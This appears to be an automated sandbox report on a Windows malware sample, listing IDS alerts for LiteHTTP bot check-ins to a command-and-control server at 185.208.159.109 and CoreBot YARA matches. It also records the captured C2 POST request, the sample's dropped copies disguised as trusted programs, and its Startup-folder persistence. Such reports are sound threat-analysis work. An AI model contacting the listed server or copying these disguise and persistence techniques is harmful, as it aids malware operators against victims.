                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49988 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49989 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49992 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49990 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49992 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49988 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49992 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49979 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49979 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49990 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49990 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49993 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49995 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49988 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49995 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49995 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49993 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49993 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49986 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49985 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49985 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49985 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49986 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49986 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49987 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49987 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49987 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49981 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49984 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49981 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49981 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49984 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49984 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49996 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49996 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49996 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49991 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49980 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49980 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49980 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49991 -> 185.208.159.109:80
                    Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49991 -> 185.208.159.109:80
                    Source: Yara match File source: 9.2.DQmU06kq9I.exe.8ba0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 9.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 9.2.DQmU06kq9I.exe.8740000.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.DQmU06kq9I.exe.9060000.3.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.DQmU06kq9I.exe.8c00000.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 9.2.DQmU06kq9I.exe.82e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 8.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.DQmU06kq9I.exe.87a0000.1.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox View ASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
                    Source: unknown TCP traffic detected without corresponding DNS query: 185.208.159.109
                    Source: unknown HTTP traffic detected:
                        POST /panel/page.php HTTP/1.1
                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.208.159.109
                        Content-Length: 471
                        Expect: 100-continue
                        Connection: Keep-Alive
                    Source: DQmU06kq9I.exe, 00000000.00000002.4547997981.0000000005280000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.000000000526E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.000000000507E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005037000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050B0000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.159.109
                    Source: DQmU06kq9I.exe, DQmU06kq9I.exe, 00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp, DQmU06kq9I.exe, 00000009.00000002.4542857867.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000003.3530428715.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000004F08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.159.109/panel/page.php
                    Source: DQmU06kq9I.exe, 00000009.00000002.4542857867.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000003.3530428715.00000000010F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.159.109/panel/page.php9
                    Source: DQmU06kq9I.exe, 00000000.00000002.4547997981.000000000521C000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.0000000005280000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.000000000507E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005037000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050B0000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000004FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.159.109/panel/page.phpP
                    Source: DQmU06kq9I.exe, 00000000.00000002.4547997981.000000000521C000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000004FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                    Operating System Destruction

                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process information set: 01 00 00 00

                    System Summary

                    Source: 9.2.DQmU06kq9I.exe.8ba0000.3.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                    Source: 0.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                    Source: 9.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                    Source: 9.2.DQmU06kq9I.exe.8740000.2.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                    Source: 0.2.DQmU06kq9I.exe.9060000.3.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                    Source: 0.2.DQmU06kq9I.exe.8c00000.2.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                    Source: 9.2.DQmU06kq9I.exe.82e0000.1.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                    Source: 8.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                    Source: 0.2.DQmU06kq9I.exe.87a0000.1.unpack, type: UNPACKEDPE Matched rule: Detects CoreBot Author: ditekSHen
                    Source: DQmU06kq9I.exeStatic PE information: section name:
                    Source: DQmU06kq9I.exeStatic PE information: section name: .idata
                    Source: DQmU06kq9I.exeStatic PE information: section name:
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name:
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name: .idata
                    Source: windows multimedia platform.exe.0.drStatic PE information: section name:
                    Source: windows nt.exe.0.drStatic PE information: section name:
                    Source: windows nt.exe.0.drStatic PE information: section name: .idata
                    Source: windows nt.exe.0.drStatic PE information: section name:
                    Source: windows photo viewer.exe.0.drStatic PE information: section name:
                    Source: windows photo viewer.exe.0.drStatic PE information: section name: .idata
                    Source: windows photo viewer.exe.0.drStatic PE information: section name:
                    Source: windows portable devices.exe.0.drStatic PE information: section name:
                    Source: windows portable devices.exe.0.drStatic PE information: section name: .idata
                    Source: windows portable devices.exe.0.drStatic PE information: section name:
                    Source: windows sidebar.exe.0.drStatic PE information: section name:
                    Source: windows sidebar.exe.0.drStatic PE information: section name: .idata
                    Source: windows sidebar.exe.0.drStatic PE information: section name:
                    Source: autoit3.exe.0.drStatic PE information: section name:
                    Source: autoit3.exe.0.drStatic PE information: section name: .idata
                    Source: autoit3.exe.0.drStatic PE information: section name:
                    Source: windowspowershell.exe.0.drStatic PE information: section name:
                    Source: windowspowershell.exe.0.drStatic PE information: section name: .idata
                    Source: windowspowershell.exe.0.drStatic PE information: section name:
                    Source: common files.exe.0.drStatic PE information: section name:
                    Source: common files.exe.0.drStatic PE information: section name: .idata
                    Source: common files.exe.0.drStatic PE information: section name:
                    Source: google.exe.0.drStatic PE information: section name:
                    Source: google.exe.0.drStatic PE information: section name: .idata
                    Source: google.exe.0.drStatic PE information: section name:
                    Source: internet explorer.exe.0.drStatic PE information: section name:
                    Source: internet explorer.exe.0.drStatic PE information: section name: .idata
                    Source: internet explorer.exe.0.drStatic PE information: section name:
                    Source: java.exe.0.drStatic PE information: section name:
                    Source: java.exe.0.drStatic PE information: section name: .idata
                    Source: java.exe.0.drStatic PE information: section name:
                    Source: jdownloader.exe.0.drStatic PE information: section name:
                    Source: jdownloader.exe.0.drStatic PE information: section name: .idata
                    Source: jdownloader.exe.0.drStatic PE information: section name:
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name:
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name: .idata
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: section name:
                    Source: microsoft.exe.0.drStatic PE information: section name:
                    Source: microsoft.exe.0.drStatic PE information: section name: .idata
                    Source: microsoft.exe.0.drStatic PE information: section name:
                    Source: microsoft office.exe.0.drStatic PE information: section name:
                    Source: microsoft office.exe.0.drStatic PE information: section name: .idata
                    Source: microsoft office.exe.0.drStatic PE information: section name:
                    Source: microsoft.net.exe.0.drStatic PE information: section name:
                    Source: microsoft.net.exe.0.drStatic PE information: section name: .idata
                    Source: microsoft.net.exe.0.drStatic PE information: section name:
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name:
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name: .idata
                    Source: mozilla maintenance service.exe.0.drStatic PE information: section name:
                    Source: msbuild.exe.0.drStatic PE information: section name:
                    Source: msbuild.exe.0.drStatic PE information: section name: .idata
                    Source: msbuild.exe.0.drStatic PE information: section name:
                    Source: msecache.exe.0.drStatic PE information: section name:
                    Source: msecache.exe.0.drStatic PE information: section name: .idata
                    Source: msecache.exe.0.drStatic PE information: section name:
                    Source: reference assemblies.exe.0.drStatic PE information: section name:
                    Source: reference assemblies.exe.0.drStatic PE information: section name: .idata
                    Source: reference assemblies.exe.0.drStatic PE information: section name:
                    Source: windows defender.exe.0.drStatic PE information: section name:
                    Source: windows defender.exe.0.drStatic PE information: section name: .idata
                    Source: windows defender.exe.0.drStatic PE information: section name:
                    Source: windows mail.exe.0.drStatic PE information: section name:
                    Source: windows mail.exe.0.drStatic PE information: section name: .idata
                    Source: windows mail.exe.0.drStatic PE information: section name:
                    Source: windows media player.exe.0.drStatic PE information: section name:
                    Source: windows media player.exe.0.drStatic PE information: section name: .idata
                    Source: windows media player.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process Stats: CPU usage > 49%
                    Source: Joe Sandbox View Dropped File: C:\Users\user\OneDrive\autoit3.exe 375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                    Source: Joe Sandbox View Dropped File: C:\Users\user\OneDrive\common files.exe 375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                    Source: DQmU06kq9I.exe, 00000000.00000002.4541111737.000000000055E000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000000.00000002.4552402541.0000000008C02000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000000.00000000.2032501274.000000000055E000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000008.00000002.4541443989.000000000055E000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000009.00000002.4542857867.000000000101B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000009.00000000.2752384736.000000000055E000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe, 00000009.00000002.4541276467.000000000055E000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe Binary or memory string: OriginalFilenameAnubis.exe> vs DQmU06kq9I.exe
                    Source: DQmU06kq9I.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9.2.DQmU06kq9I.exe.8ba0000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 0.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 9.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 9.2.DQmU06kq9I.exe.8740000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 0.2.DQmU06kq9I.exe.9060000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 0.2.DQmU06kq9I.exe.8c00000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 9.2.DQmU06kq9I.exe.82e0000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 8.2.DQmU06kq9I.exe.550000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: 0.2.DQmU06kq9I.exe.87a0000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
                    Source: DQmU06kq9I.exeStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: DQmU06kq9I.exeStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows multimedia platform.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows multimedia platform.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows nt.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows nt.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows photo viewer.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows photo viewer.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows portable devices.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows portable devices.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows sidebar.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows sidebar.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: autoit3.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: autoit3.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windowspowershell.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windowspowershell.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: common files.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: common files.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: google.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: google.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: internet explorer.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: internet explorer.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: java.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: java.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: jdownloader.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: jdownloader.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: microsoft.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: microsoft.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: microsoft office.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: microsoft office.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: microsoft.net.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: microsoft.net.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: mozilla maintenance service.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: mozilla maintenance service.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: msbuild.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: msbuild.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: msecache.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: msecache.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: reference assemblies.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: reference assemblies.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows defender.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows defender.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows mail.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows mail.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: windows media player.exe.0.drStatic PE information: Section: ZLIB complexity 0.9950706845238095
                    Source: windows media player.exe.0.drStatic PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
                    Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@53/47@0/1
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DQmU06kq9I.lnkJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1600:120:WilError_03
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2384:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2928:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1052:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: DQmU06kq9I.exeReversingLabs: Detection: 60%
                    Source: DQmU06kq9I.exeVirustotal: Detection: 34%
                    Source: DQmU06kq9I.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                    Source: DQmU06kq9I.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeFile read: C:\Users\user\Desktop\DQmU06kq9I.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\DQmU06kq9I.exe "C:\Users\user\Desktop\DQmU06kq9I.exe"
